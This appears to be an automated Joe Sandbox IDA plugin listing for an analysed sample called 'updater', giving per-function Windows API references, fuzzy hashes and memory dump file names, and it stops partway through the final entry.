Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8674540efe9c80f1eb0e1d5bf589c97fd08630f114748b9d88f856848e1f4e0
Instruction ID: c43cbcd0ef10e2d7bb51743a58543ff449430c9ff5a5af5c010266756ade155b
Opcode Fuzzy Hash: d8674540efe9c80f1eb0e1d5bf589c97fd08630f114748b9d88f856848e1f4e0
Instruction Fuzzy Hash: 61F15DB06083059FC715EF28C484A6ABBE5FF89314F54896EF8999B391D730E945CF82

Function 00321680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003216DB
_memmove.LIBCMT ref: 0032174C
_memmove.LIBCMT ref: 003217B9

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 3f533126a67ff0c4b930c9cb355112fc0ad56b2cf6dc5148edf839a9ae20af3e
Instruction ID: b3e5a3631e46094149b30e4fea9cc0cc302eaffaf0da87940e743efaeab52aca
Opcode Fuzzy Hash: 3f533126a67ff0c4b930c9cb355112fc0ad56b2cf6dc5148edf839a9ae20af3e
Instruction Fuzzy Hash: 7561D171600219EBDF05CF29EA80AAE77B9FF54310F1581A9EC19CF294EB31D960CB51

Function 0033593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00335953

Part of subcall function 0033A39B: __NMSG_WRITE.LIBCMT ref: 0033A3C2
Part of subcall function 0033A39B: __NMSG_WRITE.LIBCMT ref: 0033A3CC

__NMSG_WRITE.LIBCMT ref: 0033595A

Part of subcall function 0033A3F8: GetModuleFileNameW.KERNEL32(00000000,003D53BA,00000104,00000004,00000001,00331003), ref: 0033A48A
Part of subcall function 0033A3F8: ___crtMessageBoxW.LIBCMT ref: 0033A538

Part of subcall function 003332CF: ___crtCorExitProcess.LIBCMT ref: 003332D5
Part of subcall function 003332CF: ExitProcess.KERNEL32 ref: 003332DE

Part of subcall function 00338D58: __getptd_noexit.LIBCMT ref: 00338D58

RtlAllocateHeap.NTDLL(01530000,00000000,00000001,?,00000004,?,?,00331003,?), ref: 0033597F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 97f843c935ef9de058c5a145d1c2676b854144c7e9a87353b2f13475e39fb2c5
Instruction ID: 0ce8643c7b946b994b3142bd3093ac57155c9d5c6f189246c9303d0018bc5e79
Opcode Fuzzy Hash: 97f843c935ef9de058c5a145d1c2676b854144c7e9a87353b2f13475e39fb2c5
Instruction Fuzzy Hash: FE01BC36242B06EAE6172B28ECC2B6E334C9F52770F52052BF855AF2E1DF708D404B61

Function 016E89CD Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00020119,?), ref: 016E8A13
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000100,?,00000000,00000000,00020119,?), ref: 016E8A3A
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00020119,?), ref: 016E8A5F

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
Instruction ID: 9d1fb6834efb9ae64973e2b6a07742fab9cff11b1868e5b538ec2f1d0ff8eb02
Opcode Fuzzy Hash: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
Instruction Fuzzy Hash: B5115671E0021D6BDB11EA99CC81EEEB3BDAF58310F004569EA15D7341EB709A458BE5

Function 016E8DF1 Relevance: 4.6, APIs: 3, Instructions: 54fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,016E8E75), ref: 016E8E36
WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,016E8E75), ref: 016E8E4E
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,016E8E75), ref: 016E8E5A

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 178633c125235b54e0753a9a79bffc8260d63533cfe37040f6f1f1ca2f357264
Instruction ID: 55dffe8c61b092975d241a662b5c8305d332d1416c348efc54b2ae2803541453
Opcode Fuzzy Hash: 178633c125235b54e0753a9a79bffc8260d63533cfe37040f6f1f1ca2f357264
Instruction Fuzzy Hash: 43017171E013047FE7109AA98C96F6EB7BCDB49B10F514669B610E32D0DBB15D0096A5

Function 00315E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 0034E234

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: e234516c3905f4999259d5b2521e9971904076df1a46aaa72daf50c6a30b338a
Instruction ID: 6fcac9ac5a493e68d5e8b9b42ee89a3cede66ef58a573b78b7e1f7737c0e6af0
Opcode Fuzzy Hash: e234516c3905f4999259d5b2521e9971904076df1a46aaa72daf50c6a30b338a
Instruction Fuzzy Hash: 71327A74508341DFC72ADF54C491AAAB7E5BF89300F15896DF88A8B362C731EC85CB82

Function 016EC08D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExA.KERNELBASE(C:\,?,?,?), ref: 016EC0AB

Strings

C:\, xrefs: 016EC09F

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: DiskFreeSpace
String ID: C:\
API String ID: 1705453755-3404278061
Opcode ID: a37a59359c405479a0ae1f0106fb225d07974b81f8145074b195351799ddc50a
Instruction ID: c63eee9911c70b50258e498ab0e79955425f42a7032f7e0b2f95c37e4a35ed3d
Opcode Fuzzy Hash: a37a59359c405479a0ae1f0106fb225d07974b81f8145074b195351799ddc50a
Instruction Fuzzy Hash: DAE04F76205202ABD311DA48CC41E5777E8AB85200F440B29F995CB290DB22EA08CB62

Function 00377D6E Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00377E96

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 5b49c9a51f434391699a12637c2ece8b94998c8bf54a931041bc4e79e6e6cb90
Instruction ID: db988498d7c645cfe48f88de7effbeec6fcb5ce068dba8988177cc7d2fc0b360
Opcode Fuzzy Hash: 5b49c9a51f434391699a12637c2ece8b94998c8bf54a931041bc4e79e6e6cb90
Instruction Fuzzy Hash: 0241EB725082099FC736EFA8D9C1DBEB7E8EF19340F248499F1899B641DB759C01DBA0

Function 016EADA5 Relevance: 3.1, APIs: 2, Instructions: 94registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,016EAEAA), ref: 016EAE1F
RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,016EAEAA), ref: 016EAE53

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 41272bdc58f4a1585f62919a725729a4811fe7ef417c2fa61d1f7d4a83276979
Instruction ID: 51eb8f5b86ead7f442b855554adc6e064b719b4b122873541077087104e7317c
Opcode Fuzzy Hash: 41272bdc58f4a1585f62919a725729a4811fe7ef417c2fa61d1f7d4a83276979
Instruction Fuzzy Hash: 2D319F71E013497FEB11DAE9CC95B9EB7FAEF08300F0485A8E951E3380DB759A058B54

Function 00325F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00325FEF

Part of subcall function 0033359C: __lock.LIBCMT ref: 003335A2
Part of subcall function 0033359C: DecodePointer.KERNEL32(00000001,?,00326004,00368892), ref: 003335AE
Part of subcall function 0033359C: EncodePointer.KERNEL32(?,?,00326004,00368892), ref: 003335B9

Part of subcall function 00325F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00325F18
Part of subcall function 00325F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00325F2D

Part of subcall function 00325240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0032526C
Part of subcall function 00325240: IsDebuggerPresent.KERNEL32 ref: 0032527E
Part of subcall function 00325240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 003252E6
Part of subcall function 00325240: SetCurrentDirectoryW.KERNEL32(?), ref: 00325366

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0032602F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: f9147714d5f8fe85936211ff830f29e270ed99cb486f49b5da38253dd5ddaf52
Instruction ID: e5ad67fc006a1893451ef436327714f5a528fbef94b8a7235cb4a5874d6898a0
Opcode Fuzzy Hash: f9147714d5f8fe85936211ff830f29e270ed99cb486f49b5da38253dd5ddaf52
Instruction Fuzzy Hash: 8F118E718093519BC712DF69FD4595ABBFCEF99310F00891FF044872A1EB709644CB91

Function 003242F9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00323E72,?,?,?,00000000), ref: 00324327
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00323E72,?,?,?,00000000), ref: 00360717

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2b7e520b81ebec7f59f4c5b392409b9440f056884f07d74ed166606e874892d4
Instruction ID: 5f67b6e7de3deace82c43f47c7f4966c49ce7b1197bc5e5246abc93923b2916d
Opcode Fuzzy Hash: 2b7e520b81ebec7f59f4c5b392409b9440f056884f07d74ed166606e874892d4
Instruction Fuzzy Hash: 2B01B574244319BEF3264E24DC8AFA67A9CEB01768F14C319FBE56A1E0C7B05C558B54

Function 0033581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0033584C
__lock_file.LIBCMT ref: 0033586D

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: ef4df838bbb85c3db64013916dc6406f00dcd7c211853f991baa62638f617bc6
Instruction ID: 7457a5a9859d82c7efb96d3c007dedf8a76fbc63aaa3e0edc024ebb3d8881320
Opcode Fuzzy Hash: ef4df838bbb85c3db64013916dc6406f00dcd7c211853f991baa62638f617bc6
Instruction Fuzzy Hash: 09018F71D01709EBCF13AF6A8C8299E7B61AF80360F198115F9285E1A1DB718A21DF91

Function 003355C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00338D58: __getptd_noexit.LIBCMT ref: 00338D58

__lock_file.LIBCMT ref: 0033560B

Part of subcall function 00336E3E: __lock.LIBCMT ref: 00336E61

__fclose_nolock.LIBCMT ref: 00335616

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: a3c7f0f35367f72e7babcd2b2cadecc08e73a24bbcad4121a248ee0124a9c370
Instruction ID: 5ed063f234666fa905ea6be62500331a3cb897c3c52a1f20b54d178623d271c7
Opcode Fuzzy Hash: a3c7f0f35367f72e7babcd2b2cadecc08e73a24bbcad4121a248ee0124a9c370
Instruction Fuzzy Hash: 66F0B471802B05DAE7136F758882B6EB7A16F41330F218209F429EF1D1CBBC59019F51

Function 00335E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00335EB4
__ftell_nolock.LIBCMT ref: 00335EBF

Part of subcall function 00338D58: __getptd_noexit.LIBCMT ref: 00338D58

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: 5c2f630dd6ae52af7a8e264ca9678ec42d3701d2a3cc2e271f1f0d31477051ce
Instruction ID: 72a70053fc1b25fe444775ca622d0346b73ce6ad2a32f079838df2ca91a747cd
Opcode Fuzzy Hash: 5c2f630dd6ae52af7a8e264ca9678ec42d3701d2a3cc2e271f1f0d31477051ce
Instruction Fuzzy Hash: 9EF0A032911719AADB03BB74898379EB2A06F41331F214206F024EF1D2CFB88E029B51

Function 016E9002 Relevance: 3.0, APIs: 2, Instructions: 24fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,016E909C), ref: 016E907B
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 016E9081

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: CloseFileHandleRead
String ID:
API String ID: 2331702139-0
Opcode ID: 299abe3cd744aa1273cb4260ed9ab9cb399ffe804a4c45538df25333005c36b4
Instruction ID: c6da09e7b35258f92b8bfc3e4e845e286a98626689f519158dbeb8388340cdde
Opcode Fuzzy Hash: 299abe3cd744aa1273cb4260ed9ab9cb399ffe804a4c45538df25333005c36b4
Instruction Fuzzy Hash: F3E04F75E04204BEE700EFA4CC81EADB7FCEF48300F90446DA401D3500DA719900CBA4

Function 016E8999 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,?,016EB16D,00000000,016EB2D4,?,?,00000000,00000000), ref: 016E89A5
SetFileAttributesA.KERNEL32(00000000,00000000,00000000,?,?,016EB16D,00000000,016EB2D4,?,?,00000000,00000000), ref: 016E89C2

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 150071e8d115d48b6e860e46511f068db359f69ce08f9d5d34f1670f96483210
Instruction ID: 6eeeae4c5fc14dbf48eaa54e5aed5ff51dd334627f64c56b6e85f0bf1cac32f0
Opcode Fuzzy Hash: 150071e8d115d48b6e860e46511f068db359f69ce08f9d5d34f1670f96483210
Instruction Fuzzy Hash: 02D0C9A1F027612ADE1131BE4DC9A9A42CE5B186B1B160725F525D7383DF5A4C5201AA

Function 016EC005 Relevance: 3.0, APIs: 2, Instructions: 5COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,016EC365,00000000,016EC380,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 016EC007
TerminateProcess.KERNEL32(00000000,00000000,016EC365,00000000,016EC380,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 016EC00D

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID:
API String ID: 2429186680-0
Opcode ID: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
Instruction ID: 4fbb1c6bbc2c26375c48c82ecca27dc43fcec67ae91d9f6f241924d5f8e4e892
Opcode Fuzzy Hash: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
Instruction Fuzzy Hash: AF900245D4420210D85032B00D45F0D412A1BA0503FD104499106D5C84989D410040A9

Function 016D04A5 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,016D0838), ref: 016D04D4
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,016D0838), ref: 016D04FB

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: d8b739c53a4a5710367ce38fdece7072ee2223596824c306935fe80cdb736970
Instruction ID: faa3fc8ff78ac58b65ace6146dc3eecd0fa399acd5c82fb333e58a04974d8a25
Opcode Fuzzy Hash: d8b739c53a4a5710367ce38fdece7072ee2223596824c306935fe80cdb736970
Instruction Fuzzy Hash: 93F027B2F027215BEB20996D4C84F5759C69F457A0F044074FA0CEF3CCD6A2880146A4

Function 0031A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85992f9b7222ceb6ce63c6a4d7125c1ff5cd106815befd8976f88428e8099166
Instruction ID: 198358221c5a21b5d168ad036137bee41a942f0ad35c8a5b049b9fce667b3125
Opcode Fuzzy Hash: 85992f9b7222ceb6ce63c6a4d7125c1ff5cd106815befd8976f88428e8099166
Instruction Fuzzy Hash: B161BD70601A0A9FCB1ADF50C881EBAB7F9EF49311F128069E8168B691D774EDC4CB51

Function 0031D679 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5a978c133ef11bb5f27f2fee56003c6a6304ace6d4392819da047e80a183df
Instruction ID: 5ebfee557ccd3c74ee5e27d7a025212fac09149c96a37eeb2006680d69911798
Opcode Fuzzy Hash: bf5a978c133ef11bb5f27f2fee56003c6a6304ace6d4392819da047e80a183df
Instruction Fuzzy Hash: E85183356006149FCF1AEF68C9A1EAE77A5AF49310F158158F806AF3D2DB30ED45CB90

Function 0032410A Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 003241B2

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: acad5ef6363cbb48fa302ddbd8b6b4df4c24f12633ce4a5227d3ae288f89a5aa
Instruction ID: 5f1212df9b03a1200b18a21f6358c4a370e3a37369cf21a76b39cd7e14a860dc
Opcode Fuzzy Hash: acad5ef6363cbb48fa302ddbd8b6b4df4c24f12633ce4a5227d3ae288f89a5aa
Instruction Fuzzy Hash: 0F316D71A0062AAFCB19CF2DD8806ADB7B5FF58310F158629E81997714D770BDA0CB91

Function 00330E38 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 00330EE7

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 850454d095613e891c9f59ac316de6c04b72a1242d94cdd1e094d78b0f20a0df
